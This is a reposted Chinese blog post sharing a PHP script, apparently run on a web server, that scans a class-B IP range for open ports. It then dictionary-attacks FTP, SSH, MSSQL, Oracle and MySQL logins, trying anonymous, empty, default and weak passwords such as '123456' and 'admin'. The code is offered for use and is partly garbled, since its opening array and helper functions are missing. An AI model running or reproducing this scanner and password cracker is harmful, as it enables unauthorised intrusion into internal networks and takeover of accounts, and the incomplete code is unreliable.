转载: 可以扫描B段IP外加根据字典破解一些服务的密码,比如FTP,SSH,MySQL,MSSQL,Oracle之类,会自动尝试空密码和弱密码,比如ftp的匿名登录,mssql的sa空密码,oracle的默认密码之类。 因为php超时原因 建议扫描50ip左右 ?php#Class B PHP port scanner by
转载:
可以扫描B段IP外加根据字典破解一些服务的密码,比如FTP,SSH,MySQL,MSSQL,Oracle之类,会自动尝试空密码和弱密码,比如ftp的匿名登录,mssql的sa空密码,oracle的默认密码之类。
因为php超时原因 建议扫描50ip左右
'FTP', '22'=>'SSH', '23'=>'Telnet', '25'=>'SMTP', '79'=>'Finger', '80'=>'HTTP', '81'=>'HTTP/Proxy', '110'=>'POP3', '135'=>'MS Netbios', '139'=>'MS Netbios', '143'=>'IMAP', '162'=>'SNMP', '389'=>'LDAP', '443'=>'HTTPS', '445'=>'MS SMB', '873'=>'rsync', '1080'=>'Proxy/HTTP Server', '1433'=>'MS SQL Server', '2433'=>'MS SQL Server Hidden', '1521'=>'Oracle DB Server', '1522'=>'Oracle DB Server', '3128'=>'Squid Cache Server', '3129'=>'Squid Cache Server', '3306'=>'MySQL Server', '3307'=>'MySQL Server', '3500'=>'Squid Cache Server', '3389'=>'MS Terminal Service', '5800'=>'VNC Server', '5900'=>'VNC Server', '8080'=>'Proxy/HTTP Server', '10000'=>'Webmin', '11211'=>'Memcached' ); foreach($portarr as $port=>$name){ if(check_port($ip,$port,$timeout=0.1)==True){ echo 'Port: '.$port.' '.$name.' is open'; @ob_flush(); @flush(); if(isset($_SESSION['crack'])||$_SESSION['crack']==true){ switch($port){ case '21': $type='ftp'; break; case '22': $type='ssh'; break; case '1433': $type='mssql'; break; case '1521': case '1522': $type='oracle'; break; case '3306': case '3307': $type='mysql'; break; default: $type=false; } if($type){ global $userarr,$passarr; crackpwd($ip,$port,$userarr,$passarr,$type); @ob_flush(); @flush(); } }//if } } } if(!isset($_SESSION['startip'])){ $_SESSION['startip']='Start IP'; $_SESSION['endip']='End IP'; $_SESSION['username']='root admin'; $_SESSION['password']='123456 root 123123 admin qwerty'; } echo ' Timeout Auto Crack Password on MSSQL,MYSQL,Oracle,SSH,FTP '.$_SESSION['username'].' '.$_SESSION['password'].' Scan '; if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['timeout'])){ if(isset($_POST['crack'])){ global $userarr,$passarr; $_SESSION['crack']=true; $userarr=array_unique(explode("\n",str_replace("\r", "", $_POST['username']))); $passarr=array_unique (explode("\n",str_replace("\r", "", $_POST['password']))); $_SESSION['username']=$_POST['username']; $_SESSION['password']=$_POST['password']; } $startip=$_POST['startip']; $endip=$_POST['endip']; $timeout=$_POST['timeout']; $siparr=explode('.',$startip); $eiparr=explode('.',$endip); $ciparr=$siparr; if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){ exit('IP error: Wrong IP address or Trying to scan class A address'); } $_SESSION['startip']=$startip; $_SESSION['endip']=$endip; if($startip==$endip){ echo 'Scanning IP '.$startip.''; @ob_flush(); @flush(); scanip($startip,$timeout); @ob_flush(); @flush(); exit(); } if($eiparr[3]!=255){ $eiparr[3]+=1; } while($ciparr!=$eiparr){ $ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3]; echo 'Scanning IP '.$ip.''; @ob_flush(); @flush(); scanip($ip,$timeout); $ciparr[3]+=1; if($ciparr[3]>255){ $ciparr[2]+=1; $ciparr[3]=0; } if($ciparr[2]>255){ $ciparr[1]+=1; $ciparr[2]=0; } } }else{ exit('Missing input'); } ?>
原文地址:PHP内网端口扫描脚本, 感谢原作者分享。
